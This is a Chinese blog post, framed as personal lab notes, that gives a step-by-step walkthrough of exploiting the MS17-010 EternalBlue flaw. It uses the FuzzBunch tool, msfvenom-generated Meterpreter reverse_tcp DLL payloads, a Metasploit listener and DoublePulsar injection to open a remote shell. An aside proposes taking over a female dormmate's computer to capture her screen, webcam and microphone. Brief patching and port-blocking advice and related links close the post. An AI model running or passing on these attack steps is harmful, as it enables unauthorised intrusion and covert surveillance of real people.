版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256

声明:仅供学习交流使用,个人实验笔记。排版比较懒。

微软MS17-010
理论:SMBv1 漏洞攻击,445端口。

环境准备:

攻击资源:攻击工具包 点我
攻击者系统:Windows 7 Ultimate (x64) 点我
受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我
辅助攻击用系统:kali 点我
推荐虚拟环境构建工具:vmware workstation或oracle Vbox工具下载

操作:

1、攻击者环境部署(确保路径全英文):
虚拟机部署win7 64位环境,要么都桥接,要么都选择自定义网络。
下载python2.6并安装点我
下载pywin32并安装,一定要注意,下载对应python版本点我
将C:\Python26添加到环境变量PATH中。
将攻击工具包拖入虚拟机,或上传到虚拟机。解压后,里面有个Windows的目录,复制出来到虚拟机的c盘。
新建 listeningposts 目录。

2、受害者环境部署:

受害者系统自选一个就行,随意,安装后,需要和攻击者系统能互相ping通。

3、攻击操作:

攻击者在cmd下运行fb.py
target IP就是受害者IP
callbackIP就是攻击者的IP
USE redirection输入NO
base log 输入 c:\logs或输入NO(是否有日志记录,这个是自愿)
接着输入0,新建了一个攻击项目。
项目名称随意(英文以外名字可能会报错)。
然后输入yes确认
其他的直接回车就行了。英文可以用有道翻译。
use EternalBlue
问你是否要setting。输入yes
下面的回车就好,都是默认好的配置。
target system,如实选择受害者的系统。
mode选择fb,即输入1。
剩下的就是yes和回车了。
当出现success关键词的时候,说明攻击第一步已经完成了。
(失败的原因:
1、防火墙的保护。
2、杀毒程序的保护。
3、网络通信异常。
4、人为操作失误。)

部署辅助攻击系统:

1、部署kali,可以和攻击者正常通信即可。
2、攻击者安装xshell。
3、通过xshell ssh到kali即可。(百度关键词,kali开启和配置ssh服务)
4、利用kali 的msf生成后门文件。(LPORT端口参数随意,只要不冲突就行)
如果受害者是winXP 32位:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll
如果受害者是win7 64位:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
确认xshell已经连接到了kali,
在xshell输入:sz /opt/attack.dll
选择保存在攻击者系统的c盘根目录下即可。
xshell下:
msfconsole
use exploit/multi/handler //启用了监听模块
受害者是winXP的时候:
( set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT  19999
show options  //看一眼配置
run //开启了监听
)
受害者是win7 64位时:
(
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost kali的ip
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
)在攻击者的cmd下:
use Doublepulsar
操作系统选择目标的。
选择RunDLL
路径输入:c:\attack.dll
其他各种回车确认。
可以看到,xshell连接的kali,收到了会话连接。
可以输入whoami或者dir来验证一下。

其他资源(感觉部署环境好麻烦,想来点现成的):

在线现成的环境操作实战:点我在线实战
kali下直接实现攻击利用:http://www.jianshu.com/p/f770d0bbed77

杂谈

一般情况,女生的电脑如果和你在一个网络,比如你们宿舍之间,没有做严格的隔离,那么,理论上讲,可以完整的控制她的电脑,除非她安装了360,为何不说她安装了腾讯管家。因为,对付一些漏洞,需要足够的浪才可以,管家还是太文绉绉了。
(不仅可以截屏,还可以看摄像头,还有录音。另:现网实战前,请阅读:https://www.ishuo.cn/doc/mzlpnnqf.html)

预防和其他参考:

360提供了懒人模式的NSA攻击自动检测和防护工具,免安装。点我
使用防火墙过滤/关闭 137、139、445端口。
对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
安装微软补丁:请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010

微软EternalBlue永恒之蓝漏洞攻击测试相关推荐

  1. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  2. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  3. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  4. EternalBlue永恒之蓝漏洞(MS17-010)复现

    测试环境 靶机:    Windows7                IP:192.168.5.90   开放445端口  关闭防火墙 攻击机:Windows10/kali        IP:19 ...

  5. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  6. 永恒之蓝漏洞攻击完整步骤

    本文仅做漏洞复现记录与实现,请勿用于非法用途 需要设备: kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn ...

  7. python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤

    需要设备: kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3 ...

  8. 学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机

    一.vm虚拟机构建靶机实现互通 两个虚拟机都用NAT转换地址,设置DHCP分配IP,保证两台虚拟机和物理机在一个网段 二.kali上安装msf工具 apt-get install msf 三.msf工 ...

  9. 永恒之蓝漏洞利用及攻击

    一.基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚 ...

最新文章

  1. JSON.stringify()
  2. 独家 | 利用Auto ARIMA构建高性能时间序列模型(附Python和R代码)
  3. js判断是否在微信浏览器中打开
  4. java8安装_JMeter必知必会系列(2) JMeter安装部署
  5. java sundry tips
  6. 前端学习(3130):react-hello-react之回调形式的createRef
  7. Flutter教程app
  8. 学完Java后可从事的十大领域!
  9. 跟燕十八学习PHP-第二十五天-mysqlgroup by和having的综合练习
  10. ecshop Touch笔记
  11. VirtualLab Fusion光学仿真软件使用笔记
  12. 【个人总结版】实验报告书写指导
  13. 300英雄11月服务器维护,300英雄11月7日更新了什么?300英雄11月7日更新内容一览...
  14. 新技术在支付清算行业的创新应用
  15. canvas——绘制文字
  16. (草履虫级别的精讲)卷积神经网络的基本组成结构
  17. 微信开发者工具未绑定企业号开发者
  18. 一行代码让你伪装成黑客惊艳世人
  19. 生鲜商城系统如何营销?
  20. 基于PHP+MySQL的学生信息管理系统

热门文章

  1. Linear approximation笔记
  2. 如何使用Python实现21点小游戏?
  3. 计算机系统的有哪些功能是什么意思,olt是什么意思(olt有什么功能和用途)
  4. 信号完整性研究:什么是地弹
  5. java符合规律的随机数_云风的 BLOG
  6. 以太坊区块链实现去中心化购物功能
  7. 录取人数逐年攀升,西交电信学部的8个CS院系实力如何?
  8. 使用生辰八字取名的方法
  9. SDUT实验七编程题7-4 计算圆柱体的体积
  10. java swt 打印_SWT(JFace) 打印功能